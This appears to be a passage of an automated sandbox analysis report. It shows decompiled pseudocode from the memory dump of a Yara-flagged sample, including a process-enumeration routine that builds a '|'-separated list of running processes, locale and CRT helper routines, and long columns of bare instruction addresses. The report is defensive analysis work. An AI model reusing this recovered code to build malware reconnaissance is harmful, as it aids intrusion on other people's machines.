                                    													asm("int3"); /* int3 padding: the decompiler has run past the end of this routine into the next one. The code that follows (count == 0 returns 0, NULL dst sets errno 0x16 / EINVAL, undersized dst zero-fills then sets 0x22 / ERANGE) is the shape of the CRT memcpy_s parameter checks, so L0043A504, L0043695D and E004324E0 are consistent with _errno, _invalid_parameter_noinfo and memcpy respectively. */
                                    							_push(_t1235);
                                    							_push(_t1196);
                                    							_t1197 = _v2424;
                                    							__eflags = _t1197;
                                    							if(_t1197 != 0) {
                                    								_t740 = _v0;
                                    								__eflags = _t740;
                                    								if(_t740 != 0) {
                                    									_push(_t1146);
                                    									_t1147 = _a8;
                                    									__eflags = _t1147;
                                    									if(_t1147 == 0) {
                                    										L320:
                                    										L00431F00(_t1147, _t740, 0, _a4);
                                    										__eflags = _t1147;
                                    										if(_t1147 != 0) {
                                    											__eflags = _a4 - _t1197;
                                    											if(_a4 >= _t1197) {
                                    												_t742 = 0x16;
                                    											} else {
                                    												_t743 = L0043A504();
                                    												_push(0x22);
                                    												goto L324;
                                    											}
                                    										} else {
                                    											_t743 = L0043A504();
                                    											_push(0x16);
                                    											L324:
                                    											_pop(_t1199);
                                    											 *_t743 = _t1199;
                                    											L0043695D();
                                    											_t742 = _t1199;
                                    										}
                                    									} else {
                                    										__eflags = _a4 - _t1197;
                                    										if(_a4 < _t1197) {
                                    											goto L320;
                                    										} else {
                                    											E004324E0(_t740, _t1147, _t1197);
                                    											_t742 = 0;
                                    										}
                                    									}
                                    								} else {
                                    									_t746 = L0043A504();
                                    									_t1200 = 0x16;
                                    									 *_t746 = _t1200;
                                    									L0043695D();
                                    									_t742 = _t1200;
                                    								}
                                    							} else {
                                    								_t742 = 0;
                                    							}
                                    							return _t742;
                                    						} else {
                                    							L309:
                                    							_t1248 = _v1936;
                                    							if(_v1936 != 0) {
                                    								L0044FE8A(_t1031, _t1248,  &_v1944);
                                    							}
                                    							return L0042FD1B(_v8 ^ _t1235);
                                    						}
                                    					}
                                    				}
                                    			}
                                    [Residual column of instruction addresses (0x0044d405 through 0x0044e74d, interleaved with 0x00000000 entries) from the report's address view; the instruction text that accompanied these addresses is not present in this extraction.]
                                    0x0044d79e
                                    0x0044d79f
                                    0x0044d7a4
                                    0x0044d7a4
                                    0x0044dc08
                                    0x0044dc12
                                    0x0044dc13
                                    0x0044dc19
                                    0x0044dc1b
                                    0x0044e084
                                    0x0044e086
                                    0x0044e088
                                    0x0044e08e
                                    0x0044e090
                                    0x0044e096
                                    0x0044e098
                                    0x0044e3ea
                                    0x0044e3ea
                                    0x0044e3ec
                                    0x0044e3f2
                                    0x0044e3f9
                                    0x0044e3ff
                                    0x0044e401
                                    0x0044e49f
                                    0x0044e49f
                                    0x0044e4a1
                                    0x0044e4a2
                                    0x0044e4a8
                                    0x00000000
                                    0x0044e407
                                    0x0044e407
                                    0x0044e40a
                                    0x0044e410
                                    0x0044e416
                                    0x0044e418
                                    0x0044e41e
                                    0x0044e420
                                    0x0044e420
                                    0x0044e422
                                    0x0044e422
                                    0x0044e42b
                                    0x0044e432
                                    0x0044e438
                                    0x0044e43b
                                    0x0044e43c
                                    0x0044e43e
                                    0x0044e43e
                                    0x0044e442
                                    0x0044e444
                                    0x0044e446
                                    0x0044e44c
                                    0x0044e44f
                                    0x00000000
                                    0x0044e451
                                    0x0044e451
                                    0x0044e458
                                    0x0044e458
                                    0x0044e44f
                                    0x0044e444
                                    0x0044e418
                                    0x0044e40a
                                    0x0044e401
                                    0x0044e09e
                                    0x0044e09e
                                    0x0044e09e
                                    0x0044e0a1
                                    0x0044e0a5
                                    0x0044e0a5
                                    0x0044e0a6
                                    0x0044e0b8
                                    0x0044e0c5
                                    0x0044e0d4
                                    0x0044e0fe
                                    0x0044e103
                                    0x0044e109
                                    0x0044e10c
                                    0x0044e112
                                    0x0044e115
                                    0x0044e1ae
                                    0x0044e1b5
                                    0x0044e233
                                    0x0044e239
                                    0x0044e23f
                                    0x0044e242
                                    0x0044e244
                                    0x0044e2cd
                                    0x0044e24a
                                    0x0044e24a
                                    0x0044e250
                                    0x0044e250
                                    0x0044e256
                                    0x0044e25c
                                    0x0044e25e
                                    0x0044e260
                                    0x0044e260
                                    0x0044e266
                                    0x0044e26c
                                    0x0044e26e
                                    0x0044e276
                                    0x0044e276
                                    0x0044e27c
                                    0x0044e27e
                                    0x0044e280
                                    0x0044e286
                                    0x0044e288
                                    0x0044e39f
                                    0x0044e3a1
                                    0x0044e3a7
                                    0x0044e3a7
                                    0x0044e3aa
                                    0x0044e3ab
                                    0x00000000
                                    0x0044e28e
                                    0x0044e294
                                    0x0044e294
                                    0x0044e296
                                    0x0044e29c
                                    0x0044e29f
                                    0x0044e2a6
                                    0x0044e2ac
                                    0x0044e2ae
                                    0x0044e2d5
                                    0x0044e2d7
                                    0x0044e2d9
                                    0x0044e2db
                                    0x0044e2e1
                                    0x0044e2e7
                                    0x0044e381
                                    0x0044e381
                                    0x0044e384
                                    0x00000000
                                    0x0044e38a
                                    0x0044e38a
                                    0x0044e390
                                    0x00000000
                                    0x0044e390
                                    0x0044e2ed
                                    0x0044e2ed
                                    0x0044e2ed
                                    0x0044e2f0
                                    0x00000000
                                    0x00000000
                                    0x0044e2f2
                                    0x0044e2f4
                                    0x0044e2f6
                                    0x0044e2ff
                                    0x0044e2ff
                                    0x0044e301
                                    0x0044e307
                                    0x0044e307
                                    0x0044e313
                                    0x0044e31e
                                    0x0044e321
                                    0x0044e32e
                                    0x0044e331
                                    0x0044e332
                                    0x0044e333
                                    0x0044e339
                                    0x0044e33b
                                    0x0044e341
                                    0x0044e347
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044e349
                                    0x0044e349
                                    0x0044e349
                                    0x0044e34b
                                    0x00000000
                                    0x00000000
                                    0x0044e34d
                                    0x0044e350
                                    0x00000000
                                    0x0044e356
                                    0x0044e356
                                    0x0044e358
                                    0x0044e35a
                                    0x0044e35a
                                    0x0044e35a
                                    0x0044e362
                                    0x0044e365
                                    0x0044e365
                                    0x0044e36b
                                    0x0044e36d
                                    0x0044e36f
                                    0x0044e376
                                    0x0044e37c
                                    0x0044e37e
                                    0x00000000
                                    0x0044e37e
                                    0x00000000
                                    0x0044e350
                                    0x00000000
                                    0x0044e349
                                    0x00000000
                                    0x0044e2ed
                                    0x0044e2b0
                                    0x0044e2b0
                                    0x0044e2b2
                                    0x0044e2b8
                                    0x0044e2bf
                                    0x0044e2bf
                                    0x0044e2c2
                                    0x0044e2c2
                                    0x00000000
                                    0x0044e2b2
                                    0x00000000
                                    0x0044e396
                                    0x0044e396
                                    0x0044e397
                                    0x0044e397
                                    0x00000000
                                    0x0044e29c
                                    0x0044e1b7
                                    0x0044e1b7
                                    0x0044e1c2
                                    0x0044e1c9
                                    0x0044e1cf
                                    0x0044e1d6
                                    0x0044e1d7
                                    0x0044e1d8
                                    0x0044e1dd
                                    0x0044e1e0
                                    0x0044e1e2
                                    0x00000000
                                    0x0044e1e8
                                    0x0044e1e8
                                    0x0044e1eb
                                    0x00000000
                                    0x0044e1f1
                                    0x0044e1f1
                                    0x0044e1f8
                                    0x00000000
                                    0x0044e1fe
                                    0x0044e204
                                    0x0044e206
                                    0x0044e20c
                                    0x0044e20c
                                    0x0044e20e
                                    0x0044e20e
                                    0x0044e210
                                    0x0044e219
                                    0x0044e220
                                    0x0044e223
                                    0x0044e224
                                    0x0044e226
                                    0x0044e226
                                    0x00000000
                                    0x0044e22e
                                    0x0044e1f8
                                    0x0044e1eb
                                    0x0044e1e2
                                    0x0044e11b
                                    0x0044e11b
                                    0x0044e121
                                    0x0044e123
                                    0x0044e13f
                                    0x0044e142
                                    0x00000000
                                    0x0044e148
                                    0x0044e148
                                    0x0044e14f
                                    0x00000000
                                    0x0044e155
                                    0x0044e15b
                                    0x0044e15d
                                    0x0044e163
                                    0x0044e163
                                    0x0044e165
                                    0x0044e165
                                    0x0044e167
                                    0x0044e170
                                    0x0044e177
                                    0x0044e17a
                                    0x0044e17b
                                    0x0044e17d
                                    0x0044e17d
                                    0x0044e185
                                    0x0044e185
                                    0x0044e187
                                    0x00000000
                                    0x0044e18d
                                    0x0044e18d
                                    0x0044e193
                                    0x0044e196
                                    0x0044e460
                                    0x0044e462
                                    0x0044e463
                                    0x0044e469
                                    0x0044e475
                                    0x0044e47c
                                    0x0044e47d
                                    0x0044e47e
                                    0x0044e483
                                    0x0044e486
                                    0x0044e19c
                                    0x0044e19c
                                    0x0044e1a3
                                    0x00000000
                                    0x0044e1a3
                                    0x0044e196
                                    0x0044e187
                                    0x0044e14f
                                    0x0044e125
                                    0x0044e125
                                    0x0044e127
                                    0x0044e12d
                                    0x0044e133
                                    0x0044e134
                                    0x0044e3b1
                                    0x0044e3b1
                                    0x0044e3b8
                                    0x0044e3b9
                                    0x0044e3ba
                                    0x0044e3bf
                                    0x0044e3c2
                                    0x0044e3c2
                                    0x0044e3c2
                                    0x0044e123
                                    0x0044e3c4
                                    0x0044e3c4
                                    0x0044e3c6
                                    0x0044e48d
                                    0x0044e494
                                    0x0044e49b
                                    0x0044e4ae
                                    0x0044e4b4
                                    0x0044e4b5
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044e3cc
                                    0x0044e3d2
                                    0x0044e3d2
                                    0x0044e3d8
                                    0x0044e3d8
                                    0x0044e3e4
                                    0x00000000
                                    0x0044e3e4
                                    0x0044dc21
                                    0x0044dc21
                                    0x0044dc23
                                    0x0044dc29
                                    0x0044dc2b
                                    0x0044dc31
                                    0x0044dc33
                                    0x0044dfaa
                                    0x0044dfaa
                                    0x0044dfac
                                    0x0044dfb2
                                    0x0044dfb9
                                    0x0044dfbb
                                    0x0044e01a
                                    0x0044e01d
                                    0x0044e023
                                    0x0044e029
                                    0x0044e02f
                                    0x0044e031
                                    0x0044e037
                                    0x0044e039
                                    0x0044e039
                                    0x0044e03b
                                    0x0044e03b
                                    0x0044e03d
                                    0x0044e046
                                    0x0044e04d
                                    0x0044e050
                                    0x0044e051
                                    0x0044e053
                                    0x0044e053
                                    0x0044e05b
                                    0x0044e05d
                                    0x0044e063
                                    0x0044e069
                                    0x0044e06c
                                    0x00000000
                                    0x0044e072
                                    0x0044e072
                                    0x0044e079
                                    0x0044e079
                                    0x0044e06c
                                    0x0044e05d
                                    0x0044e031
                                    0x0044dfbd
                                    0x0044dfbd
                                    0x0044dfbf
                                    0x0044dfc5
                                    0x0044dfcb
                                    0x00000000
                                    0x0044dfcb
                                    0x0044dfbb
                                    0x0044dc39
                                    0x0044dc39
                                    0x0044dc39
                                    0x0044dc3c
                                    0x0044dc40
                                    0x0044dc40
                                    0x0044dc41
                                    0x0044dc53
                                    0x0044dc60
                                    0x0044dc6f
                                    0x0044dc99
                                    0x0044dc9e
                                    0x0044dca4
                                    0x0044dca7
                                    0x0044dcad
                                    0x0044dcb0
                                    0x0044dd2c
                                    0x0044dd33
                                    0x0044ddf7
                                    0x0044ddfd
                                    0x0044de03
                                    0x0044de06
                                    0x0044de08
                                    0x0044de91
                                    0x0044de0e
                                    0x0044de0e
                                    0x0044de14
                                    0x0044de14
                                    0x0044de1a
                                    0x0044de20
                                    0x0044de22
                                    0x0044de24
                                    0x0044de24
                                    0x0044de2a
                                    0x0044de30
                                    0x0044de32
                                    0x0044de3a
                                    0x0044de3a
                                    0x0044de40
                                    0x0044de42
                                    0x0044de44
                                    0x0044de4a
                                    0x0044de4c
                                    0x0044df63
                                    0x0044df65
                                    0x0044df6b
                                    0x0044df6b
                                    0x00000000
                                    0x0044de52
                                    0x0044de58
                                    0x0044de58
                                    0x0044de5a
                                    0x0044de60
                                    0x0044de63
                                    0x0044de6a
                                    0x0044de70
                                    0x0044de72
                                    0x0044de99
                                    0x0044de9b
                                    0x0044de9d
                                    0x0044de9f
                                    0x0044dea5
                                    0x0044deab
                                    0x0044df45
                                    0x0044df45
                                    0x0044df48
                                    0x00000000
                                    0x0044df4e
                                    0x0044df4e
                                    0x0044df54
                                    0x00000000
                                    0x0044df54
                                    0x0044deb1
                                    0x0044deb1
                                    0x0044deb1
                                    0x0044deb4
                                    0x00000000
                                    0x00000000
                                    0x0044deb6
                                    0x0044deb8
                                    0x0044deba
                                    0x0044dec3
                                    0x0044dec3
                                    0x0044dec5
                                    0x0044decb
                                    0x0044decb
                                    0x0044ded7
                                    0x0044dee2
                                    0x0044dee5
                                    0x0044def2
                                    0x0044def5
                                    0x0044def6
                                    0x0044def7
                                    0x0044defd
                                    0x0044deff
                                    0x0044df05
                                    0x0044df0b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0044df0d
                                    0x0044df0d
                                    0x0044df0d
                                    0x0044df0f
                                    0x00000000
                                    0x00000000
                                    0x0044df11
                                    0x0044df14
                                    0x0044dfce
                                    0x0044dfce
                                    0x0044dfd0
                                    0x0044dfd6
                                    0x0044dfdc
                                    0x0044dfdd
                                    0x00000000
                                    0x0044df1a
                                    0x0044df1a
                                    0x0044df1c
                                    0x0044df1e
                                    0x0044df1e
                                    0x0044df1e
                                    0x0044df26
                                    0x0044df29
                                    0x0044df29
                                    0x0044df2f
                                    0x0044df31
                                    0x0044df33
                                    0x0044df3a
                                    0x0044df40
                                    0x0044df42
                                    0x00000000
                                    0x0044df42
                                    0x00000000
                                    0x0044df14
                                    0x00000000
                                    0x0044df0d
                                    0x00000000
                                    0x0044deb1
                                    0x0044de74
                                    0x0044de74
                                    0x0044de76
                                    0x0044de7c
                                    0x0044de83
                                    0x0044de83
                                    0x0044de86
                                    0x0044de86
                                    0x00000000
                                    0x0044de76
                                    0x00000000
                                    0x0044df5a
                                    0x0044df5a
                                    0x0044df5b
                                    0x0044df5b
                                    0x00000000
                                    0x0044de60
                                    0x0044dd39
                                    0x0044dd39
                                    0x0044dd44
                                    0x0044dd4b
                                    0x0044dd51
                                    0x0044dd58
                                    0x0044dd59
                                    0x0044dd5a
                                    0x0044dd5f
                                    0x0044dd62
                                    0x0044dd64
                                    0x0044dd80
                                    0x0044dd83
                                    0x00000000
                                    0x0044dd89
                                    0x0044dd89
                                    0x0044dd90
                                    0x00000000
                                    0x0044dd96
                                    0x0044dd9c
                                    0x0044dd9e
                                    0x0044dda4
                                    0x0044dda4
                                    0x0044dda6
                                    0x0044dda6
                                    0x0044dda8
                                    0x0044ddb1
                                    0x0044ddb8
                                    0x0044ddbb
                                    0x0044ddbc
                                    0x0044ddbe
                                    0x0044ddbe
                                    0x00000000
                                    0x0044dda6
                                    0x0044dd90
                                    0x0044dd66
                                    0x0044dd68
                                    0x0044dd6e
                                    0x0044dd74
                                    0x0044dd75
                                    0x00000000
                                    0x0044dd75
                                    0x0044dd64
                                    0x0044dcb2
                                    0x0044dcb2

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                    • Instruction ID: bf911c1a37dbfafd62c1db5ad45da0714cb81aa7e36eaf23024dd27f54a8ec40
                                    • Opcode Fuzzy Hash: 42261130ad1b2c87b12dda9ae586fc566389ec3ff41f756cf8e7a1c957aab040
                                    • Instruction Fuzzy Hash: D2C24872E086288FEB25CE299D407EAB7B5FB44305F1541EBD80DE7240E778AE818F45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040D211(void* __ebx, void* __ecx, void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				char _v172;
                                    				char _v196;
                                    				char _v220;
                                    				char _v244;
                                    				char _v268;
                                    				char _v292;
                                    				char _v316;
                                    				char _v340;
                                    				char _v864;
                                    				intOrPtr _v892;
                                    				void* _v900;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t47;
                                    				void* _t48;
                                    				void* _t50;
                                    				void* _t129;
                                    				void* _t130;
                                    
                                    				_t77 = __ecx;
                                    				_t76 = __ebx;
                                    				_t129 = __ecx;
                                    				E004020D5(__ebx, __ecx);
                                    				 *0x46beb4 = L00417614(_t77);
                                    				_t130 = CreateToolhelp32Snapshot(2, 0);
                                    				if(_t130 != 0) {
                                    					_v900 = 0x22c;
                                    					Process32FirstW(_t130,  &_v900);
                                    					while(Process32NextW(_t130,  &_v900) != 0) {
                                    						E0040427F(_t76,  &_v28,  &_v864);
                                    						_t47 = E00417226(_t76,  &_v340, L00417642(_v892) & 0x000000ff);
                                    						_t48 = E00417226(_t76,  &_v316, _v892);
                                    						_t50 = E0041739C(_t76,  &_v268, L00417678( &_v292, _v892));
                                    						L00401FD1(_t129, _t58, _t130, E00405343(_t76,  &_v52, L00402F1D( &_v76, E00405343(_t76,  &_v100, L00402F1D( &_v124, E00405343(_t76,  &_v148, L00402F1D( &_v172, E00405343(_t76,  &_v196, E004074F0(_t76,  &_v220, _t129, __eflags, E0041739C(_t76,  &_v244,  &_v28)), _t129, __eflags, 0x46061c), _t50), _t129, __eflags, 0x46061c), _t48), _t129, __eflags, 0x46061c), _t47), _t129, __eflags, "|"));
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401EF0();
                                    						L00401FC7();
                                    						L00401FC7();
                                    						L00401EF0();
                                    					}
                                    					CloseHandle(_t130);
                                    				}
                                    				return _t129;
                                    			}

                                    APIs
                                      • Part of subcall function 00417614: GetCurrentProcess.KERNEL32(?,?,?,004180D1,WinDir,00000000,00000000), ref: 00417625
                                      • Part of subcall function 00417614: IsWow64Process.KERNEL32(00000000,?,?,004180D1,WinDir,00000000,00000000), ref: 0041762C
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0040D231
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040D253
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040D3DA
                                    • CloseHandle.KERNEL32(00000000), ref: 0040D3E9
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                    • String ID:
                                    • API String ID: 715332099-0
                                    • Opcode ID: cefc01ee75dd76c23d776ef3f1d742279f651e097c3a1724514ace9d7abc3bff
                                    • Instruction ID: 43f38b1539949543322e8b732d0e6a0d6251ec8b58a184f5b0d342f80c8325cc
                                    • Opcode Fuzzy Hash: cefc01ee75dd76c23d776ef3f1d742279f651e097c3a1724514ace9d7abc3bff
                                    • Instruction Fuzzy Hash: CD415D319142198BCB15FB66DC51AEEB375AF50304F1001BEB40AB61E2EF786F89DE58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 92%
                                    			E0044A343(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                    				signed int _v8;
                                    				short _v248;
                                    				signed int _v252;
                                    				intOrPtr _v256;
                                    				void* __ebp;
                                    				signed int _t50;
                                    				signed int _t58;
                                    				signed int _t67;
                                    				signed int _t69;
                                    				signed int _t72;
                                    				signed int _t73;
                                    				intOrPtr _t75;
                                    				signed int _t76;
                                    				signed int _t84;
                                    				signed int _t86;
                                    				signed int _t87;
                                    				signed int _t89;
                                    				intOrPtr _t90;
                                    				void* _t92;
                                    				intOrPtr* _t113;
                                    				void* _t117;
                                    				intOrPtr* _t119;
                                    				signed int _t123;
                                    				signed int _t124;
                                    				signed int _t125;
                                    				signed int _t126;
                                    				void* _t127;
                                    				signed int* _t129;
                                    				int _t132;
                                    				signed int _t133;
                                    				void* _t134;
                                    
                                    				_t50 =  *0x46a00c; // 0xbd45ae92
                                    				_v8 = _t50 ^ _t133;
                                    				_t92 = L00441CE2(__ebx, __ecx, __edx);
                                    				_t129 =  *(L00441CE2(_t92, __ecx, __edx) + 0x34c);
                                    				_t132 = L0044A66B(_a4);
                                    				asm("sbb ecx, ecx");
                                    				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                                    					_t58 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
                                    					_v252 = _v252 & 0x00000000;
                                    					__eflags = _t58;
                                    					if(_t58 != 0) {
                                    						L18:
                                    						__eflags = ( *_t129 & 0x00000300) - 0x300;
                                    						if(( *_t129 & 0x00000300) == 0x300) {
                                    							L39:
                                    							__eflags =  !( *_t129 >> 2) & 0x00000001;
                                    							L40:
                                    							return L0042FD1B(_v8 ^ _t133);
                                    						}
                                    						asm("sbb ecx, ecx");
                                    						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                    						__eflags = _t67;
                                    						if(_t67 != 0) {
                                    							_t69 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                    							__eflags = _t69;
                                    							if(_t69 != 0) {
                                    								__eflags =  *(_t92 + 0x60);
                                    								if( *(_t92 + 0x60) != 0) {
                                    									goto L39;
                                    								}
                                    								__eflags =  *(_t92 + 0x5c);
                                    								if( *(_t92 + 0x5c) == 0) {
                                    									goto L39;
                                    								}
                                    								_t72 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                    								__eflags = _t72;
                                    								if(_t72 != 0) {
                                    									goto L39;
                                    								}
                                    								_push(_t129);
                                    								_t73 = L0044A7C3(0, _t132, 0);
                                    								__eflags = _t73;
                                    								if(_t73 == 0) {
                                    									goto L39;
                                    								}
                                    								 *_t129 =  *_t129 | 0x00000100;
                                    								__eflags = _t129[1];
                                    								L37:
                                    								if(__eflags == 0) {
                                    									_t129[1] = _t132;
                                    								}
                                    								goto L39;
                                    							}
                                    							 *_t129 =  *_t129 | 0x00000200;
                                    							_t123 =  *_t129;
                                    							__eflags =  *(_t92 + 0x60) - _t69;
                                    							if( *(_t92 + 0x60) == _t69) {
                                    								__eflags =  *(_t92 + 0x5c) - _t69;
                                    								if( *(_t92 + 0x5c) == _t69) {
                                    									goto L23;
                                    								}
                                    								_t113 =  *((intOrPtr*)(_t92 + 0x50));
                                    								_v256 = _t113 + 2;
                                    								do {
                                    									_t75 =  *_t113;
                                    									_t113 = _t113 + 2;
                                    									__eflags = _t75 - _v252;
                                    								} while (_t75 != _v252);
                                    								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
                                    								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
                                    									_t69 = 0;
                                    									goto L23;
                                    								}
                                    								_push(_t129);
                                    								_t76 = L0044A7C3(_t92, _t132, 1);
                                    								__eflags = _t76;
                                    								if(_t76 == 0) {
                                    									goto L39;
                                    								}
                                    								 *_t129 =  *_t129 | 0x00000100;
                                    								_t69 = 0;
                                    								L24:
                                    								__eflags = _t129[1] - _t69;
                                    								goto L37;
                                    							}
                                    							L23:
                                    							_t124 = _t123 | 0x00000100;
                                    							__eflags = _t124;
                                    							 *_t129 = _t124;
                                    							goto L24;
                                    						}
                                    						 *_t129 = _t67;
                                    						L2:
                                    						goto L40;
                                    					}
                                    					asm("sbb eax, eax");
                                    					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                                    					__eflags = _t84;
                                    					if(_t84 == 0) {
                                    						goto L1;
                                    					}
                                    					_t86 = L0044CF51(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                                    					_pop(_t117);
                                    					__eflags = _t86;
                                    					if(_t86 != 0) {
                                    						__eflags =  *_t129 & 0x00000002;
                                    						if(( *_t129 & 0x00000002) != 0) {
                                    							goto L18;
                                    						}
                                    						__eflags =  *(_t92 + 0x5c);
                                    						if( *(_t92 + 0x5c) == 0) {
                                    							L14:
                                    							_t125 =  *_t129;
                                    							__eflags = _t125 & 0x00000001;
                                    							if((_t125 & 0x00000001) != 0) {
                                    								goto L18;
                                    							}
                                    							_t87 = L0044A79F(_t132);
                                    							__eflags = _t87;
                                    							if(_t87 == 0) {
                                    								goto L18;
                                    							}
                                    							_t126 = _t125 | 0x00000001;
                                    							__eflags = _t126;
                                    							 *_t129 = _t126;
                                    							goto L17;
                                    						}
                                    						_t89 = L0043B6DE(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
                                    						_t134 = _t134 + 0xc;
                                    						__eflags = _t89;
                                    						if(_t89 != 0) {
                                    							goto L14;
                                    						}
                                    						 *_t129 =  *_t129 | 0x00000002;
                                    						__eflags =  *_t129;
                                    						_t129[2] = _t132;
                                    						_t119 =  *((intOrPtr*)(_t92 + 0x50));
                                    						_t127 = _t119 + 2;
                                    						do {
                                    							_t90 =  *_t119;
                                    							_t119 = _t119 + 2;
                                    							__eflags = _t90 - _v252;
                                    						} while (_t90 != _v252);
                                    						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
                                    						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
                                    							_t129[1] = _t132;
                                    						}
                                    					} else {
                                    						 *_t129 =  *_t129 | 0x00000304;
                                    						_t129[1] = _t132;
                                    						L17:
                                    						_t129[2] = _t132;
                                    					}
                                    					goto L18;
                                    				}
                                    				L1:
                                    				 *_t129 =  *_t129 & 0x00000000;
                                    				goto L2;
                                    			}
                                    0x0044a34e
                                    0x0044a355
                                    0x0044a363
                                    0x0044a36b
                                    0x0044a37a
                                    0x0044a386
                                    0x0044a39f
                                    0x0044a3b6
                                    0x0044a3bb
                                    0x0044a3c4
                                    0x0044a3c6
                                    0x0044a479
                                    0x0044a482
                                    0x0044a484
                                    0x0044a576
                                    0x0044a57d
                                    0x0044a580
                                    0x0044a590
                                    0x0044a590
                                    0x0044a497
                                    0x0044a4a8
                                    0x0044a4ae
                                    0x0044a4b0
                                    0x0044a4c3
                                    0x0044a4ca
                                    0x0044a4cc
                                    0x0044a538
                                    0x0044a53b
                                    0x00000000
                                    0x00000000
                                    0x0044a53d
                                    0x0044a540
                                    0x00000000
                                    0x00000000
                                    0x0044a54c
                                    0x0044a553
                                    0x0044a555
                                    0x00000000
                                    0x00000000
                                    0x0044a557
                                    0x0044a55c
                                    0x0044a564
                                    0x0044a566
                                    0x00000000
                                    0x00000000
                                    0x0044a568
                                    0x0044a56e
                                    0x0044a571
                                    0x0044a571
                                    0x0044a573
                                    0x0044a573
                                    0x00000000
                                    0x0044a571
                                    0x0044a4ce
                                    0x0044a4d4
                                    0x0044a4d6
                                    0x0044a4d9
                                    0x0044a4eb
                                    0x0044a4ee
                                    0x00000000
                                    0x00000000
                                    0x0044a4f0
                                    0x0044a4f6
                                    0x0044a4fc
                                    0x0044a4fc
                                    0x0044a4ff
                                    0x0044a502
                                    0x0044a502
                                    0x0044a513
                                    0x0044a516
                                    0x0044a532
                                    0x00000000
                                    0x0044a532
                                    0x0044a518
                                    0x0044a51c
                                    0x0044a524
                                    0x0044a526
                                    0x00000000
                                    0x00000000
                                    0x0044a528
                                    0x0044a52e
                                    0x0044a4e3
                                    0x0044a4e3
                                    0x00000000
                                    0x0044a4e3
                                    0x0044a4db
                                    0x0044a4db
                                    0x0044a4db
                                    0x0044a4e1
                                    0x00000000
                                    0x0044a4e1
                                    0x0044a4b2
                                    0x0044a3a4
                                    0x00000000
                                    0x0044a3a6
                                    0x0044a3da
                                    0x0044a3e8
                                    0x0044a3ee
                                    0x0044a3f0
                                    0x00000000
                                    0x00000000
                                    0x0044a3fc
                                    0x0044a402
                                    0x0044a403
                                    0x0044a405
                                    0x0044a412
                                    0x0044a415
                                    0x00000000
                                    0x00000000
                                    0x0044a417
                                    0x0044a41b
                                    0x0044a45f
                                    0x0044a45f
                                    0x0044a461
                                    0x0044a464
                                    0x00000000
                                    0x00000000
                                    0x0044a467
                                    0x0044a46d
                                    0x0044a46f
                                    0x00000000
                                    0x00000000
                                    0x0044a471
                                    0x0044a471
                                    0x0044a474
                                    0x00000000
                                    0x0044a474
                                    0x0044a42a
                                    0x0044a42f
                                    0x0044a432
                                    0x0044a434
                                    0x00000000
                                    0x00000000
                                    0x0044a436
                                    0x0044a436
                                    0x0044a439
                                    0x0044a43c
                                    0x0044a43f
                                    0x0044a442
                                    0x0044a442
                                    0x0044a445
                                    0x0044a448
                                    0x0044a448
                                    0x0044a455
                                    0x0044a458
                                    0x0044a45a
                                    0x0044a45a
                                    0x0044a407
                                    0x0044a407
                                    0x0044a40d
                                    0x0044a476
                                    0x0044a476
                                    0x0044a476
                                    0x00000000
                                    0x0044a405
                                    0x0044a3a1
                                    0x0044a3a1
                                    0x00000000

                                    APIs
                                      • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                      • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
